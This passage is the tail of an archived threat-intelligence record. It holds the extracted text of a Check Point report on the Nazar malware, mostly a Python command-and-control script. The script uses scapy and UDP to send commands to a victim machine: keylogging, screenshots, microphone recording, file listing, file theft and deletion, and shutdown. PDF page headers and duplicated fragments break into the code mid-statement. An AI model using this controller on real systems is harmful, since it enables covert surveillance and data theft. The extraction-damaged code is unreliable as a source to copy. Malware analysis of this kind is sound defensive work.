= 1234\r\n# 4000 is the usual port without sending files, but we use it for everything, because why not?\r\nSERVER_PORT = 4000\r\n# We want to make sure the ID has the little endian of it\r\nID = struct.unpack('\u003eH',struct.pack('\u003cH',4000))[0]\r\ndef get_response(sock, should_loop):\r\n started = False\r\n total_payload = b''\r\n while(should_loop or not started):\r\n try:\r\n payload, client_address = sock.recvfrom(4096)\r\n except ConnectionResetError:\r\n payload, client_address = sock.recvfrom(4096)\r\n \r\n total_payload += payload\r\n # Good enough stop condition\r\n if (len(payload) \u003e= 4\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 26 of 28\n\nand payload[:3] == b'---'\r\n and 
payload[4] \u003e= ord('0')\r\n and payload[4] \u003c= ord('9')):\r\n should_loop = False\r\n started = True\r\n hexdump.hexdump(total_payload)\r\nMENU = \"\"\"Welcome to NAZAR. Please choose:\r\n 999 - Get a ping from the victim.\r\n 555 - Get information on the victim's machine.\r\n 311 - Start keylogging (312 to disable).\r\n 139 - Shutdown victim's machine.\r\n 189 - Screenshot (313 to disable).\r\n 119 - Record audio from Microphone (315 to disable).\r\n 199 - List drives.\r\n 200 - List recursivley from directory*.\r\n 201 - Send a file*.\r\n 209 - Remove file*.\r\n 599 - List devices.\r\n* (append a path, use double-backslashes)\r\nquit to Quit,\r\nhelp for this menu.\r\n \"\"\"\r\ndef get_message():\r\n while True:\r\n curr_message = input('\u003e ').strip()\r\n if 'quit' in curr_message:\r\n return None\r\n if 'help' in curr_message:\r\n print(MENU)\r\n else:\r\n return curr_message\r\ndef get_sock():\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n server_address = '0.0.0.0'\r\n server = (server_address, SERVER_PORT)\r\n sock.bind(server)\r\n return sock\r\ndef main(ip_addr):\r\n sock = get_sock()\r\n \r\n print(MENU)\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 27 of 28\n\nmulti_packets = [\"200\",\"201\", \"119\", \"189\", \"311\", \"199\", \"599\"]\r\n single_packets = [\"999\", \"555\"]\r\n all_commands = single_packets + multi_packets\r\n while True:\r\n \r\n curr_message = get_message()\r\n if not curr_message:\r\n break\r\n \r\n # Send message using scapy\r\n # Make sure the IP identification field is little endian of the port.\r\n sr1(\r\n IP(dst=ip_addr, id=ID)/\r\n UDP(sport=SERVER_PORT,dport=1234)/\r\n Raw(load=curr_message),\r\n verbose=0\r\n )\r\n command = curr_message[:3]\r\n if command not in all_commands:\r\n continue\r\n should_loop = command in multi_packets\r\n get_response(sock, should_loop)\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description=\"victim's IP\")\r\n 
parser.add_argument('ip')\r\n args = parser.parse_args()\r\n main(args.ip)\r\nSource: https://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 28 of 28\n\nsock = get_sock() print(MENU)   \nmulti_packets = [\"200\",\"201\", \"119\", \"189\", \"311\", \"199\", \"599\"]\nsingle_packets = [\"999\", \"555\"]  \n   Page 24 of 28",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2020/nazar-spirits-of-the-past/"
	],
	"report_names": [
		"nazar-spirits-of-the-past"
	],
	"threat_actors": [],
	"ts_created_at": 1775874199,
	"ts_updated_at": 1775874255,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/86864f605f7035b4d98342f0087a70ea42f42a7f.pdf",
		"text": "https://archive.orkl.eu/86864f605f7035b4d98342f0087a70ea42f42a7f.txt",
		"img": "https://archive.orkl.eu/86864f605f7035b4d98342f0087a70ea42f42a7f.jpg"
	}
}